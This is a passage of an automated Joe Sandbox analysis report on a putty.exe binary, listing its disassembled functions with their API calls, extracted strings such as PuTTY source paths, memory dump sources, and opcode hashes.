                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Char$ObjectSelectWidthWidth32
                                                          • String ID:
                                                          • API String ID: 4136774150-0
                                                          • Opcode ID: f0198642de19c96cdc66f8beea68bc1deb05833f5721ec38c6a4087a9e179af5
                                                          • Instruction ID: abeb4ed96e91bc252a990e7135d706572610f9a4211a4006881a64f1e9d24be9
                                                          • Opcode Fuzzy Hash: f0198642de19c96cdc66f8beea68bc1deb05833f5721ec38c6a4087a9e179af5
                                                          • Instruction Fuzzy Hash: 4F41E533A1940256EB649B24E484A79E361FB84B44FD41132EA5EC77D4CE7FE802E714
                                                          Function 00007FF738B01B40 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01B4F
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01B85
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01BB2
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01BC3
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01BD4
                                                          • SetLastError.KERNEL32(?,?,?,00007FF738AF8ED1,?,?,?,?,00007FF738B050A3,?,?,00000000,00007FF738B01C5E,?,?,?), ref: 00007FF738B01BEF
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: ae4cd5ffa51278c9c9ff1584ec2722894828c174a33d3779a9d712916efffa38
                                                          • Instruction ID: 50c000bcd4d5c6cfb5ee6e5671604add462d349b0c3b8a65aeb60d0dba456078
                                                          • Opcode Fuzzy Hash: ae4cd5ffa51278c9c9ff1584ec2722894828c174a33d3779a9d712916efffa38
                                                          • Instruction Fuzzy Hash: F411D1A3A0C60361FA28B371565183DE1869F447B0F900730D83E477D6EF7EA842A22B
                                                          Function 00007FF738B0BC00 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID: MZx
                                                          • API String ID: 2718003287-2575928145
                                                          • Opcode ID: e1fbbe907faa3b4890b7ae7faba687bd7e731967cfaa35ae938c5d24a66423bf
                                                          • Instruction ID: d339dacf41886da50ef440bb29b16f316815bffde052bdfbaf8875320f1117d1
                                                          • Opcode Fuzzy Hash: e1fbbe907faa3b4890b7ae7faba687bd7e731967cfaa35ae938c5d24a66423bf
                                                          • Instruction Fuzzy Hash: BED13363B08A8299E710DF79D4106ACF7B1FB04B98B904232CE6D57B99DF3AD406D316
                                                          Function 00007FF738A756F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCPInfo.KERNEL32(00000000,?,?,0000000100000083,00000000,?,00000000,00000000,00007FF738A74222), ref: 00007FF738A75825
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Info
                                                          • String ID: UTF-8
                                                          • API String ID: 1807457897-243350608
                                                          • Opcode ID: 4d0900a3972e6aa67fdcfce35f530c52b4d99f4ebdefa0280f964932d7d58080
                                                          • Instruction ID: ee84c8c2b4bdab8ef087d94a854f08c94121e16496c2ff0ed0fdb349d98da034
                                                          • Opcode Fuzzy Hash: 4d0900a3972e6aa67fdcfce35f530c52b4d99f4ebdefa0280f964932d7d58080
                                                          • Instruction Fuzzy Hash: 85710623F0E68366FA6477645850A3EE6E16F41364FD80532ED9D072E1DD3FE841B228
                                                          Function 00007FF738B0762C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738B019C8: GetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019D7
                                                            • Part of subcall function 00007FF738B019C8: FlsGetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019EC
                                                            • Part of subcall function 00007FF738B019C8: SetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A77
                                                          • TranslateName.LIBCMT ref: 00007FF738B07699
                                                          • TranslateName.LIBCMT ref: 00007FF738B076D4
                                                          • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF738AF7140), ref: 00007FF738B07719
                                                          • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF738AF7140), ref: 00007FF738B07741
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastNameTranslate$CodePageValidValue
                                                          • String ID: utf8
                                                          • API String ID: 1791977518-905460609
                                                          • Opcode ID: 7fa227e98a0a6ec30ce97f664649ba0abab5266cf78db809c634d52a8dc15e80
                                                          • Instruction ID: 423f37452dfa9d5af1a1a3abaaeae9f8f4517cdb6da0c9bc56af300e1a20f272
                                                          • Opcode Fuzzy Hash: 7fa227e98a0a6ec30ce97f664649ba0abab5266cf78db809c634d52a8dc15e80
                                                          • Instruction Fuzzy Hash: A65196A3A08343A2E664BB12D400AB9E654AF44B80F844135CE6D47792DF3FE555E36F
                                                          Function 00007FF738B15744 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135timeCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _get_daylight$InformationTimeZone_invalid_parameter_noinfo
                                                          • String ID: @
                                                          • API String ID: 3482513350-2766056989
                                                          • Opcode ID: cd24742ad62feda542a55c21e70db84c2a5d5635fd28f5533d9d1e1c3d716e18
                                                          • Instruction ID: 2f486dd970f0cb5738cf85325dcbff53ba4c3ccb5a05e5f0bb33b021a1e4e46a
                                                          • Opcode Fuzzy Hash: cd24742ad62feda542a55c21e70db84c2a5d5635fd28f5533d9d1e1c3d716e18
                                                          • Instruction Fuzzy Hash: 4251D473A0864396E710FF22E8805AAF762FB88784F844135EA4D47B96DF3DE4019769
                                                          Function 00007FF738A538FF Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend$LocalTimewcsftime
                                                          • String ID: %Y-%m-%d %H:%M:%S
                                                          • API String ID: 2023452587-819171244
                                                          • Opcode ID: 372bc13db1d882b2b296d98ef2a3135d5becb213e57101d97af90f41ed2a4930
                                                          • Instruction ID: 6a3604effc9e2fd60cd4f52149a80b1db5eb100c960f439446d24404d75b99e8
                                                          • Opcode Fuzzy Hash: 372bc13db1d882b2b296d98ef2a3135d5becb213e57101d97af90f41ed2a4930
                                                          • Instruction Fuzzy Hash: 7A41C1B3A09A03A6E710AB10E851779E390FBC5390F884331D94D877A4CF3EE546A728
                                                          Function 00007FF738AFB0D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID: MZx
                                                          • API String ID: 3215553584-2575928145
                                                          • Opcode ID: 6cc51e3ed7b752e8f09b28c0a0846ac8a3f82b3ca429e8163b0842fd606f671d
                                                          • Instruction ID: 9db5d4b5c7ed7e158ecbeb10b59abd30e0e4800c1be5b289c15be18cb84e786b
                                                          • Opcode Fuzzy Hash: 6cc51e3ed7b752e8f09b28c0a0846ac8a3f82b3ca429e8163b0842fd606f671d
                                                          • Instruction Fuzzy Hash: EF41A43390A78595E762AF31E85067DFBE4AB06B44F888032E6CC07746CE3E9415D32A
                                                          Function 00007FF738A6B460 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: htonl
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c$addr->addresses && step.curraddr < addr->naddresses$false && "bad address family in sk_addrcopy"$family != AF_UNSPEC
                                                          • API String ID: 2009864989-1075602240
                                                          • Opcode ID: 2e7a59c0b8d8703f1956a80c8c533f56134deb0ffb2b0e82dd4185afc88fa7dc
                                                          • Instruction ID: 5adcfb918708246b2b7e4dcc9fc5f95ea8298b49ac3e3f2371c329b6edbb3232
                                                          • Opcode Fuzzy Hash: 2e7a59c0b8d8703f1956a80c8c533f56134deb0ffb2b0e82dd4185afc88fa7dc
                                                          • Instruction Fuzzy Hash: 36217663A0A607E2FE30AB15D4819B4D3D0FF54744F984431CA4D47295DE3EE542E729
                                                          Function 00007FF738A594D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ItemMessageSend
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX$c->ctrl->listbox.height != 0
                                                          • API String ID: 3015471070-502068358
                                                          • Opcode ID: a8bc93aff5f14b9ad480b50528ba427e3c2402bc3545210796070fefc6a6bd9d
                                                          • Instruction ID: 1246f0a43b2bb9e9267ca6040994aa23a1574e7498305eb397f5ff1670f97ac5
                                                          • Opcode Fuzzy Hash: a8bc93aff5f14b9ad480b50528ba427e3c2402bc3545210796070fefc6a6bd9d
                                                          • Instruction Fuzzy Hash: 6831C473B0A502A1FB60AB19E944B64E750EB847A8F894231CE0D07791DF3EE495E714
                                                          Function 00007FF738A6AE90 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: htonlinet_ntoa
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/network.c$<unknown>$addr->addresses && step.curraddr < addr->naddresses
                                                          • API String ID: 298042256-1369832353
                                                          • Opcode ID: ec09f110da0b110d43016520fb59be07aeaa37eb2a604bdbf79392e45f675bb9
                                                          • Instruction ID: 6b8ed966514e5f98a068722fe339c1a037ccc3eb88ff4bd8c66ef92e598b0493
                                                          • Opcode Fuzzy Hash: ec09f110da0b110d43016520fb59be07aeaa37eb2a604bdbf79392e45f675bb9
                                                          • Instruction Fuzzy Hash: 2221F5A3B09702A2FE20EB219850A78E390AF48BC4FD44135DD4D07794DE3EE502E729
                                                          Function 00007FF738A37100 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: FileView$CloseHandleUnmap
                                                          • String ID: %p:%u$Serialised configuration data was invalid
                                                          • API String ID: 2927507641-1340088990
                                                          • Opcode ID: 1f748e64f740fb363a683afb079e19648defc08c367bf72b76af7a6ecde7d6ae
                                                          • Instruction ID: bd36234ddbadb837d044651f4ca1b7c106425a62fb9a1bd810665b9978974da7
                                                          • Opcode Fuzzy Hash: 1f748e64f740fb363a683afb079e19648defc08c367bf72b76af7a6ecde7d6ae
                                                          • Instruction Fuzzy Hash: 17218333A0D64692EA51EB14F85076AE3A0EF85780F901031EA8E47F64DF7EE405DB14
                                                          Function 00007FF738A31DDE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Caret$Window$BlinkCreateFlashProcShowTime
                                                          • String ID:
                                                          • API String ID: 3048652251-3916222277
                                                          • Opcode ID: 4688c87af7469075efd59302d809246c4db8de73df617baf4f989ec76de68786
                                                          • Instruction ID: 6081171ef79bed726d93ce6418ed42de94aaf5b623883857e91455c0a66d08ff
                                                          • Opcode Fuzzy Hash: 4688c87af7469075efd59302d809246c4db8de73df617baf4f989ec76de68786
                                                          • Instruction Fuzzy Hash: FC21BE73A0A68691E7A0EB11E458BEAF768EF88B94F840031DE4D43381DF7ED885D714
                                                          Function 00007FF738A3CBE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$CheckItemMenu
                                                          • String ID: '
                                                          • API String ID: 1924917330-1997036262
                                                          • Opcode ID: c70aba2d3228059daeb953c4da53d826689c6e99a259729a0a59ee13740f572c
                                                          • Instruction ID: 2444e6078d7cafaae217c768cda705834d9bc4c930572ff10bccbe7c11555ee1
                                                          • Opcode Fuzzy Hash: c70aba2d3228059daeb953c4da53d826689c6e99a259729a0a59ee13740f572c
                                                          • Instruction Fuzzy Hash: 1711E26771465042E7A0AB3AE450B2AB321EBC97B4F504231DE6E83BC4CF3DD4418710
                                                          Function 00007FF738A69F80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLast$CreateDelete
                                                          • String ID: Unable to delete '%s': %s
                                                          • API String ID: 3657518308-26304762
                                                          • Opcode ID: a2eeb90ef7a25348029317c67a1c057a214783dd391cde8fcbebd317eaf38799
                                                          • Instruction ID: 4f378afa3ad26f8aa543fb59f1f23da2fc1a4372c1d07310bc1e596a38fc1b0e
                                                          • Opcode Fuzzy Hash: a2eeb90ef7a25348029317c67a1c057a214783dd391cde8fcbebd317eaf38799
                                                          • Instruction Fuzzy Hash: 20110832B0860352E7507B74A90577EE291AF817B0F944334DA7E83BD4DF3E9941A214
                                                          Function 00007FF738A53F10 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • %s Licence, xrefs: 00007FF738A53F35
